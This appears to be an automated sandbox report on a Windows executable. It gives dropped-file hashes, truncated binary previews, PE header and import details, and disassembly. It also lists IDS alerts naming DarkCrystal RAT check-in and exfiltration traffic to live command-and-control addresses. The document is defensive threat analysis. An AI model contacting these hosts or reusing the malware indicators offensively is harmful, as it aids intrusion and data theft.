Preview:	SuNAInIE634ChVGZP3EwQCUj6Mczeyq7xmQB0DsmNZbCQcyQ94b7K0sQanD5KTjIN7O5FFjLLcj0kSSeYMzkWsx639kMAwb30TyTN2L4UPvrR1pIUjh8d9veJSBFeXLZBpARd9RfB4PH6GpBUc1aOcZ0hUK51Fa7EWpm0XpVSC7jtoiCm9uBguKiPJtIzWo5dSDjaCL6xfIMf0H3vHS1UZaTMGXqngg5YBFal8mjyxNAl7DYC0XrDxkE1tXTpeTR9MyeuqSxesCgLarOD8oxJy2laBj1lS3Ue6AYJioWhjMVuD2bCIQr0fILUNDtHbLMysCOZSFeURPjlh0WIHydCMd8yzE5e4OGXAgCBoBuCvXiQijxWrk9msKmODajOJ9ZCILlAyUeFEaQy5sPQQixUPeo03x8Ncf2v8fHX8wiWG3hS3xTUKT7kMExnguHAWQniif0Zk1ReAaOV6W7GenCIiRj3sd0NpiAzQ8uX74tSBdkv0crJxBgtNfAQ57qHADzcaYF8mjIj3tGFqxCQwraoBRlu8dbANmR8nIVbXshN26zdY5jI4aUTmKaIxU9IHIVQbIbibk2DJNvEbIWD3TFwS8VdsMoCsYFtkjBQdBqThQKZYVrp86OyDj7dx80O5zVvHCe2GFj2mvOCx5EWf9EwJQqBlhcfLcXr5YRW1zi2XWMRU5q13dt6vjl1WcQinErKXhHZnrfqaMYwEYrq1klssb6WwaAZiAOTpC4xxQOM7CfiKzw7ukqCc9b5kvmNrGHa7FHCd42kWZuq6YL7oCo8TM0ql8MCoBf15EkErud0rFqDOv9LjoiobJGvPbaerz6V42u1yHQ3iyQOgxb09Bd9c0av8yyQT8I1JUIWAIXbYpFn22PbAkfqW63Db939SAkjpYELoE01nBlwvx3FiXQsdbfMbF4AOXIXFf7dxEx5uoCUUGRoFxa5u1GO31ujJzmP3NrQzZRejU7zZK2UxP4a7

C:\Windows\Resources\audiodg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Windows\System32\CSC8CDC9FB2323C4007AF66CC17D2144E5.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.93331082663602
Encrypted:	false
SSDEEP:	48:6FJXPtKM7Jt8Bs3FJsdcV4MKe27yF99vqBHqOulajfqXSfbNtm:MPRPc+Vx9MyF99vkUcjRzNt
MD5:	E833FD00892C01F74EE2755CC391D2EB
SHA1:	844F00B3818E11AD01A10783B0D0C6BA53B847D4
SHA-256:	AE5F80086A56171FCFD23C4FBF8BFB128AA014623E32C2C6B1B3EE5D22FD304A
SHA-512:	11CF37A70AF9E4F4E88ED7116E56A0389E31B69C5608116CB1FE1A770F194A5FA91D950E3F85252A8FBE6D2862FD30EFE713F60FFD415F819DC442745791B002
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..f.............................'... ...@....@.. ....................................@.................................@'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.9994441991295675
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	iqA8j9yGcd.exe
File size:	29'106'718 bytes
MD5:	7ea99740a913fd01ab5b6d630a65f501
SHA1:	fe11a17c1a403d6df28508d576c76ece07cce88b
SHA256:	06d1a9fd3099cfb0cc829db930ab25f75a532e5e670e1704844cf7b1000d6314
SHA512:	29f0f688d920bccc887f70710c3b6b01dd004dbef0c294bc57a46d7c460dc979ddb08a8d3c21df26510cbe3c380dc17dcc43e4fa86dc9d56dd4ff17de2280953
SSDEEP:	393216:CUrTbCVFENlgdkQbaVxN2dAdpN7D9aJtW9dcGMBD2KSedViDKKeLQOshouIkPFt4:CUvRgdjtAd99dfGV6qLxwouZtRL
TLSH:	B4573304934868D5F282A03D86ADC607EA61F442778DC88E53ABCB695F635CC1D7BF8D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc.....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d..

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x14000cdb0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x66CB93CF [Sun Aug 25 20:27:59 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FCC2CB34B7Ch
dec eax
add esp, 28h
jmp 00007FCC2CB3479Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007FCC2CB34F48h
test eax, eax
je 00007FCC2CB34943h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007FCC2CB34927h
dec eax
cmp ecx, eax
je 00007FCC2CB34936h
xor eax, eax
dec eax
cmpxchg dword ptr [0003577Ch], ecx
jne 00007FCC2CB34910h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007FCC2CB34919h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007FCC2CB34929h
mov byte ptr [00035765h], 00000001h
call 00007FCC2CB34075h
call 00007FCC2CB35360h
test al, al
jne 00007FCC2CB34926h
xor al, al
jmp 00007FCC2CB34936h
call 00007FCC2CB41E7Fh
test al, al
jne 00007FCC2CB3492Bh
xor ecx, ecx
call 00007FCC2CB35370h
jmp 00007FCC2CB3490Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003572Ch], 00000000h
mov ebx, ecx
jne 00007FCC2CB34989h
cmp ecx, 01h
jnbe 00007FCC2CB3498Ch
call 00007FCC2CB34EBEh
test eax, eax
je 00007FCC2CB3494Ah
test ebx, ebx
jne 00007FCC2CB34946h
dec eax
lea ecx, dword ptr [00035716h]
call 00007FCC2CB41C72h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca5c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0xeb4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2250	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x48000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f00	0x2a000	a6c3b829cc8eaabb1a474c227e90407f	False	0.5514206659226191	data	6.487493643901088	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a50	0x12c00	6ce9e781fca2f928bbae5609875944da	False	0.52453125	data	5.752832113672091	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2250	0x2400	181312260a85d10a1454ba38901c499b	False	0.4705946180555556	data	5.290347578351011	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0xeb4	0x1000	47d8e897636a16013dcfc0453b14792d	False	0.407958984375	data	5.340979003299043	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x48000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x470e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.39305054151624547
RT_GROUP_ICON	0x47990	0x14	data	1.15
RT_MANIFEST	0x479a4	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-09-02T16:50:52.541191+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56203	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:30.839903+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56244	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:25.164189+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56236	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:13.302113+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56220	443	192.168.2.5	149.154.167.220
2024-09-02T16:52:00.409109+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56275	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:23.099579+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56234	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:19.382934+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56227	443	192.168.2.5	149.154.167.220
2024-09-02T16:50:46.810747+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56198	443	192.168.2.5	149.154.167.220
2024-09-02T16:50:43.205047+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56195	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:56.755719+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56271	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:27.088228+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56240	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:54.894920+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56269	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:28.947186+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56242	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:43.332187+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56256	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:17.524543+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56224	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:32.612514+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56245	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:27.008615+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56239	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:05.620714+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56211	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:58.632168+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56274	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:53.016944+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56268	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:56.774757+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56272	443	192.168.2.5	149.154.167.220
2024-09-02T16:50:50.764954+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56202	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:45.112513+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56258	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:35.510879+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56248	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:32.782379+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56246	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:45.112673+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56257	443	192.168.2.5	149.154.167.220
2024-09-02T16:52:00.467486+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56276	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:54.896512+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56270	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:11.390076+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56218	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:41.187569+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56254	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:53.030573+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56267	443	192.168.2.5	149.154.167.220
2024-09-02T16:50:58.121696+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56207	443	192.168.2.5	149.154.167.220
2024-09-02T16:50:54.409262+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56204	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:03.729587+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56210	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:15.526223+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56221	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:39.297396+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56251	443	192.168.2.5	149.154.167.220
2024-09-02T16:50:56.250795+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56206	443	192.168.2.5	149.154.167.220
2024-09-02T16:52:02.318988+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56277	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:07.513636+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56212	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:23.089511+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56233	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:19.383006+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56226	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:43.332169+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56255	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:37.420325+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56249	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:35.514201+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56247	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:01.876163+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56209	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:51.164759+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56265	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:48.958034+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56261	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:39.303186+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56252	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:30.754642+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56243	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:17.524807+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56223	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:47.073504+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56259	443	192.168.2.5	149.154.167.220
2024-09-02T16:50:41.747464+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56194	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:28.872233+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56241	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:37.402996+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56250	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:25.163311+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56237	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:21.247470+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56231	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:21.414649+0200	TCP	2048130	ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)	1	56199	80	192.168.2.5	194.58.42.154
2024-09-02T16:50:59.980991+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56208	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:21.242886+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56230	443	192.168.2.5	149.154.167.220
2024-09-02T16:50:48.689775+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56200	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:47.091136+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56260	443	192.168.2.5	149.154.167.220
2024-09-02T16:50:47.432132+0200	TCP	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	56199	80	192.168.2.5	194.58.42.154
2024-09-02T16:51:09.495635+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56213	443	192.168.2.5	149.154.167.220
2024-09-02T16:50:45.948094+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56197	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:51.163629+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56264	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:48.971331+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56262	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:58.551326+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56273	443	192.168.2.5	149.154.167.220
2024-09-02T16:52:02.319111+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56278	443	192.168.2.5	149.154.167.220
2024-09-02T16:51:41.151295+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	56253	443	192.168.2.5	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2024 16:50:05.959285975 CEST	49706	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:50:05.964133024 CEST	80	49706	208.95.112.1	192.168.2.5
Sep 2, 2024 16:50:05.964206934 CEST	49706	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:50:05.973467112 CEST	49706	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:50:05.982096910 CEST	80	49706	208.95.112.1	192.168.2.5
Sep 2, 2024 16:50:06.727399111 CEST	80	49706	208.95.112.1	192.168.2.5
Sep 2, 2024 16:50:06.728841066 CEST	80	49706	208.95.112.1	192.168.2.5
Sep 2, 2024 16:50:06.728954077 CEST	49706	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:50:08.768409967 CEST	49707	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:08.768457890 CEST	443	49707	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:08.768531084 CEST	49707	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:08.782186031 CEST	49707	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:08.782202005 CEST	443	49707	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:09.252290964 CEST	443	49707	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:09.252358913 CEST	49707	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:09.256088018 CEST	49707	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:09.256108999 CEST	443	49707	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:09.256345034 CEST	443	49707	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:09.307212114 CEST	49707	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:09.378134966 CEST	49707	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:09.424498081 CEST	443	49707	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:09.504686117 CEST	443	49707	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:09.504818916 CEST	443	49707	185.199.108.133	192.168.2.5
Sep 2, 2024 16:50:09.504878998 CEST	49707	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:09.517018080 CEST	49707	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:50:30.858911037 CEST	49706	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:50:31.479186058 CEST	56191	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:50:31.484138012 CEST	80	56191	208.95.112.1	192.168.2.5
Sep 2, 2024 16:50:31.484206915 CEST	56191	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:50:31.484551907 CEST	56191	80	192.168.2.5	208.95.112.1
